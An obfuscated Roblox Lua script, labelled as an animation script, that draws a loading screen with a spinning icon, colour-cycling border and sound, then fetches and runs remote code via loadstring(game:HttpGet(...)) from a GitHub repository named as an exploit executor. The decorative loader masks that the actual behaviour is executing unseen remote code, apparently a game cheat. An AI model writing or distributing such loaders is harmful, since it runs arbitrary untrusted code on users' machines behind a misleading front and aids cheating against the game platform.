--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

game.StarterGui:SetCore("SendNotification",{Title="Notification",Text="Enjoy using the animation script by alip",Icon="rbxassetid://7072718364",Duration=5 + 0 });local v0=game.Players.LocalPlayer;local v1=Instance.new("ScreenGui");local v2=Instance.new("Frame");local v3=Instance.new("UICorner");local v4=Instance.new("UIStroke");local v5=Instance.new("TextLabel");local v6=Instance.new("ImageLabel");local v7=Instance.new("Sound");v1.Name="LoadingGUI";v1.Parent=v0:WaitForChild("PlayerGui");v1.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v2.Name="loadingFrame";v2.Parent=v1;v2.AnchorPoint=Vector2.new(0.5,0.5 -0 );v2.BackgroundColor3=Color3.fromRGB(1090 -(68 + 997) ,1295 -(226 + 1044) ,91 -66 );v2.Position=UDim2.new(0.5 -0 ,0 -0 ,0.5 -0 ,117 -(32 + 85) );v2.Size=UDim2.new(0 + 0 ,45 + 155 ,957 -(892 + 65) ,477 -277 );v3.CornerRadius=UDim.new(0 -0 ,44 -19 );v3.Parent=v2;v4.Parent=v2;v4.Thickness=1084 -(1020 + 60) ;v4.Transparency=0 -0 ;v4.Color=Color3.fromRGB(863 -608 ,350 -(87 + 263) ,180 -(67 + 113) );task.spawn(function() local v49=0 + 0 ;local v50;while true do if (v49==(0 -0)) then v50=0;while v2 and v2.Parent  do v50=(v50 + (1748 -(760 + 987)))%(265 + 95) ;local v52=Color3.fromHSV(v50/(1430 -1070) ,767 -(745 + 21) ,1 + 0 );v4.Color=v52;wait(952.05 -(802 + 150) );end break;end end end);v6.Name="loadingCircle";v6.Parent=v2;v6.AnchorPoint=Vector2.new(0.5 -0 ,0.5 -0 );v6.Position=UDim2.new(0.5 + 0 ,0 + 0 ,0.4,0 + 0 );v6.Size=UDim2.new(997 -(915 + 82) ,198 -128 ,0 + 0 ,92 -22 );v6.Image="rbxassetid://133898459740182";v6.BackgroundTransparency=1188 -(1069 + 118) ;v5.Name="loadingText";v5.Parent=v2;v5.AnchorPoint=Vector2.new(1413.5 -(447 + 966) ,2 -1 );v5.Position=UDim2.new(0.5 -0 ,0,1 -0 , -(711 -(376 + 325)));v5.Size=UDim2.new(1 + 0 ,0 -0 ,0 + 0 ,821 -(368 + 423) );v5.Text="Wait a minute";v5.TextColor3=Color3.fromRGB(801 -546 ,273 -(10 + 8) ,980 -725 );v5.BackgroundTransparency=443 -(416 + 26) ;v5.TextScaled=true;v5.Font=Enum.Font.Gotham;v7.Name="LoadingSound";v7.SoundId="rbxassetid://9118823104";v7.Volume=3 -2 ;v7.Parent=v2;v7:Play();local v46=game:GetService("TweenService");local v47=true;coroutine.wrap(function() while v47 do local v51=v46:Create(v6,TweenInfo.new(1 + 0 ,Enum.EasingStyle.Linear),{Rotation=v6.Rotation + (636 -276) });v51:Play();v51.Completed:Wait();end end)();wait(3 + 0 );v47=false;local v48=v46:Create(v2,TweenInfo.new(1181 -(1123 + 57) ,Enum.EasingStyle.Sine),{Size=UDim2.new(0,438 -(145 + 293) ,254 -(163 + 91) ,0),Rotation=1150 -(44 + 386) ,Position=UDim2.new(0.5 + 0 ,1486 -(998 + 488) ,0.5 + 0 ,0 + 0 ),BackgroundTransparency=773 -(201 + 571) });v48:Play();v48.Completed:Wait();v1:Destroy();loadstring(game:HttpGet("https://raw.githubusercontent.com/alifSTARZ/Execeutor-xploit-force-1.2.0/refs/heads/main/Jsjsj"))();
